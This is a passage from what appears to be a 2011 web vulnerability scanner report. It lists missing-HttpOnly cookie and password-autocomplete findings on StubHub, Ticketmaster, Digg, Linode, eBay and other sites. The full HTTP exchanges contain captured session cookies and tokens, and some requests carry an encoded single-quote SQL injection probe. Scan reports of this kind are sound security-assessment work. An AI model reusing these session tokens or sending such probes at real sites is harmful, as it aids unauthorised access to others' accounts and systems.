STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; TLTHID=E8A4044AB23510B2043FC687D11520A8; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; fsr.a=1311100553264

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:46 GMT
Server: Apache
Set-Cookie: TLTHID=EB2903FAB23510B2F895E17C95DDB51E; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:20:17 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:46 GMT
Vary: Accept-Encoding
Content-Length: 4318
Content-Type: text/javascript

FSR.surveydefs = [{
name: 'purchase',
invite: {
when: 'onentry',
delay: 0
},
pop: {
when: 'now'
},
criteria: {
sp: 32,
lf: 0
...[SNIP]...

14.166. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /resources/mojito/img/common/welcome_banner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/mojito/img/common/welcome_banner.gif HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; TLTHID=E551BC2EB23510B2DFDBC89D01B99543; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.a=1311100546159

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:39 GMT
Server: Apache
Set-Cookie: TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; Path=/; Domain=.stubhub.com
Last-Modified: Wed, 29 Jun 2011 00:07:08 GMT
Accept-Ranges: bytes
Content-Length: 10048
Cache-Control: max-age=31536000
Expires: Wed, 18 Jul 2012 18:35:39 GMT
Content-Type: image/gif

GIF89a..D.......h.....Lt.......*Z..J|........................................................................!.......,......D......ydi.h..l..p,.tm.x..|....pH,....r.lv>...9.X...v..z...xL.....z.n....|N.
...[SNIP]...

14.167. http://www.ticketmaster.com/json/menu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /json/menu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json/menu?domain_id=1&brand= HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in; CMPS=9/5zpXwS+lM9dMYILHV6iTnnjHn/JjrEoIh2Xg8PzFxlgu8vzRGTzw==; __cs_rr=1; MAJOR_CATEGORY=10001; foresee.alive=1311100560796; _E=%7B%22flags%22%3A%7B%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 4755
Date: Tue, 19 Jul 2011 18:36:28 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=238; path=/; domain=.ticketmaster.com
Set-Cookie: LANGUAGE=en-us; path=/; domain=.ticketmaster.com

{"10001":{"links":{"6":{"link":"/Matt-Nathanson-tickets/artist/861263","source_id":2,"position":6,"link_text":"Matt Nathanson"},"3":{"link":"/311-tickets/artist/759806","source_id":2,"position":3,"lin
...[SNIP]...

14.168. http://www.ticketmaster.com/json/search/genremenu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /json/search/genremenu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json/search/genremenu?dma_id=238 HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in; CMPS=9/5zpXwS+lM9dMYILHV6iTnnjHn/JjrEoIh2Xg8PzFxlgu8vzRGTzw==; __cs_rr=1; MAJOR_CATEGORY=10001; foresee.alive=1311100560796; _E=%7B%22flags%22%3A%7B%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Content-Type: text/javascript; charset=UTF-8
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Vary: Accept-Encoding
Content-Length: 735
Date: Tue, 19 Jul 2011 18:36:28 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=238; path=/; domain=.ticketmaster.com
Set-Cookie: LANGUAGE=en-us; path=/; domain=.ticketmaster.com

{"responseHeader":{"status":0,"QTime":7},"response":{"facet_counts":{},"numFound":1403,"docs":[],"start":0},"facet_counts":{"facet_fields":{"SportsBrowseGenre":["Basketball",11,"Boxing",3,"Football",1
...[SNIP]...

15. Password field with autocomplete enabled  previous  next
There are 29 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


15.1. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=29908 10.2.128.186
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9012

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

15.2. http://forum.redbyte.ro/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.redbyte.ro
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: forum.redbyte.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 17:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 61872


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>UNIVERSITATEA DE MEDICINA SI FARMACIE "IULIU HATIEGANU"</title>
<script type="text/JavaScript">
<!-
...[SNIP]...
<td bgcolor="#F0F0F0"><form name="form1" method="post" action="login.aspx">
<table width="100%" border="0" cellspacing="1" cellpadding="5">
...[SNIP]...
<td><input name="parola" type="password" id="parola"></td>
...[SNIP]...

15.3. http://manager.linode.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://manager.linode.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: manager.linode.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 15:14:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 3433


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>Linode Login</title>
<link rel="sty
...[SNIP]...
<br>

<form name="CFForm_1" id="CFForm_1" action="https://manager.linode.com/session/login" method="post" onsubmit="return _CF_checkCFForm_1(this)"> <input name="redirectHint" id="redirectHint" type="hidden" />
...[SNIP]...
<td><input name="auth_password" id="auth_password" type="password" maxlength="128" tabindex="2" class="input" size="24" border="0" /></td>
...[SNIP]...

15.4. https://signin.ebay.com/ws/eBayISAPI.dll  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://signin.ebay.com
Path:   /ws/eBayISAPI.dll

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3 HTTP/1.1
Host: signin.ebay.com
Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^idm/14e272014^; ds2=sotr/b13qzzzzzLCz^ssts/1311100657078^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5Epsi%3DArmkOaAs*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
Set-Cookie: ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
Set-Cookie: dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
Set-Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
Set-Cookie: s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 20544
Date: Tue, 19 Jul 2011 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script></script><d
...[SNIP]...
<span><form name="SignInForm" id="SignInForm" method="post" action="https://signin.ebay.com/ws/eBayISAPI.dll?co_partnerId=2&amp;siteid=0&amp;UsingSSL=1"><input type="hidden" name="MfcISAPICommand" id="MfcISAPICommand" value="SignInWelcome">
...[SNIP]...
<span><input size="40" maxlength="64" class="txtBxF" value="" name="pass" id="pass" type="password"></span>
...[SNIP]...

15.5. http://waypointlivingspaces.com/function.mysql-connect  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /function.mysql-connect

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /function.mysql-connect HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=%2527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.6.9.1311109188886; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 21:04:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 21:04:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/function.mysql-connect?destination=function.mysql-connect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.6. http://waypointlivingspaces.com/locate-dealer  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /locate-dealer HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:49:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/locate-dealer?destination=node%2F1456" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.7. http://waypointlivingspaces.com/locate-dealer  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /locate-dealer?zip=10010 HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:49:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/locate-dealer?destination=node%2F1456%3Fzip%3D10010" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.8. http://waypointlivingspaces.com/locate-dealer  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /locate-dealer?zip=%2527 HTTP/1.1
Host: waypointlivingspaces.com
